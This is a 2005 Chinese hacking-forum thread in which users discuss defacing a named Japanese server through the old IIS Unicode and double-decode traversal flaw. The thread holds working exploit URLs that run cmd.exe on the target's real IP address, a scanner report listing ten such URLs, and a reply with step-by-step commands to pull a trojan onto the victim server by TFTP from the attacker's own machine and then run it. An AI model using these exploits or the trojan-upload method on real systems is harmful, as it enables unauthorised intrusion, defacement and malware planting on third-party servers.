黑色海岸线论坛 - Powered by Discuz! Board

标题: 日本unicode 漏洞机子如何改写其主页 [打印本页]

作者: swordfly 时间: 2005-4-28 12:47 标题: 日本unicode 漏洞机子如何改写其主页

可以成功建立文件夹删除更名
看来有写权限,但我想建个网页就不成功,是什么原因?是我命令错误,还是日本的服务器特别
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd".exe?/c+echo+test+>d:\InetPub\wwwroot\hack.htm
听说要在cmd后加" 我也加了,可怎么就没写成呢?
无法显示网页

作者: swordfly 时间: 2005-4-28 21:43 标题: 日本unicode 漏洞机子如何改写其主页

这个ip 219.166.16.58  日本的
x-scan扫出来,斑竹帮看看  为什么echo命令不成功?

型端口/服务安全漏洞及解决方案
提示 domain (53/tcp) Maybe the "domain" service running on this port.
NESSUS_ID : 10330

漏洞 http (80/tcp) IIS编码/解码漏洞: http://219.166.16.58/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
漏洞 http (80/tcp) IIS编码/解码漏洞: http://219.166.16.58/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
漏洞 http (80/tcp) IIS编码/解码漏洞: http://219.166.16.58/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
漏洞 http (80/tcp) IIS编码/解码漏洞: http://219.166.16.58/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
漏洞 http (80/tcp) IIS编码/解码漏洞: http://219.166.16.58/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
漏洞 http (80/tcp) IIS编码/解码漏洞: http://219.166.16.58/msadc/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
漏洞 http (80/tcp) IIS编码/解码漏洞: http://219.166.16.58/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
漏洞 http (80/tcp) IIS编码/解码漏洞: http://219.166.16.58/msadc/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
漏洞 http (80/tcp) IIS编码/解码漏洞: http://219.166.16.58/msadc/..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir
漏洞 http (80/tcp) IIS编码/解码漏洞: http://219.166.16.58/msadc/..%u00255c..%u00255c..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir

作者: 千與千尋 时间: 2005-4-29 03:13 标题: 日本unicode 漏洞机子如何改写其主页

我晕~~~ 这么老漏洞
自己安装一个TFTP软件,首先将你要上传的木马的某一个程序 aaa.exe 放到 TFTP 目录下面然后在浏览器里输入
http://XXX.XXX.XXX.XXX/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp -i YYY.YYY.YYY.YYY GET aaa.exe c:\\inetpub \\scripts\\bbb.exe
这里的YYY.YYY.YYY.YYY为你的主机IP C:\\INETPUB\\SCRIPTS\\ 为主侵主机的目录，
bbb.exe 就是上传以后的 aaa.exe （木马）文件
然后在浏览器的地址栏中输入:
http://XXX.XXX.XXX.XXX/scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\bbb.exe启动木马......

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)